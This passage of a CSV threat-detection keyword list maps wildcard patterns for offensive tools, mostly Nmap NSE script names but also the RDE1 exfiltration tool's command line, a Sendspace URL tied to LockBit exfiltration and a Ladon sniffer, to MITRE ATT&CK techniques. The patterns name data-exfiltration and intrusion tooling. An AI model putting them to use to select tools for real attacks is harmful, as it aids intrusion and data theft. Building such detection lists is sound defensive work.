- T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-errors.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-exif-spider.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-favicon.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-feed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-fetch.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-fileupload-exploiter.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-form-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-form-fuzzer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-frontpage-login.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-generator.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-git.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-gitweb-projects-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-google-malware.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-grep.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-hp-ilo-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-huawei-hg5xx-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-icloud-findmyiphone.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-icloud-sendmsg.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-iis-short-name-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-iis-webdav-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-internal-ip-disclosure.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-joomla-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-jsonp-detection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-lexmark-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,0,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -* http-lfi.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* http-litespeed-sourcecode-download.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* http-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-majordomo2-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-malware-host.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-mcmp.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-method-tamper.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-mobileversion-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-nikto-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* http-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-open-proxy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-open-redirect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-passwd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-phpmyadmin-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-phpself-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-php-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-proxy-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-put.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-put-server.py*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* http-qnap-nas-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-referer-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-rfi-spider.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-robots.txt.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-robtex-reverse-ip.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-robtex-shared-ns.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* https://www.sendspace.com/file/*,greyware_tool_keyword,sendspace.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -* http-sap-netweaver-leak.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-security-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-server-header.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-shellshock.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-sitemap-generator.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-slowloris.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-slowloris-check.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* HTTPSniffer *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* http-spider-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* http-sql-injection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* https-redirect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A 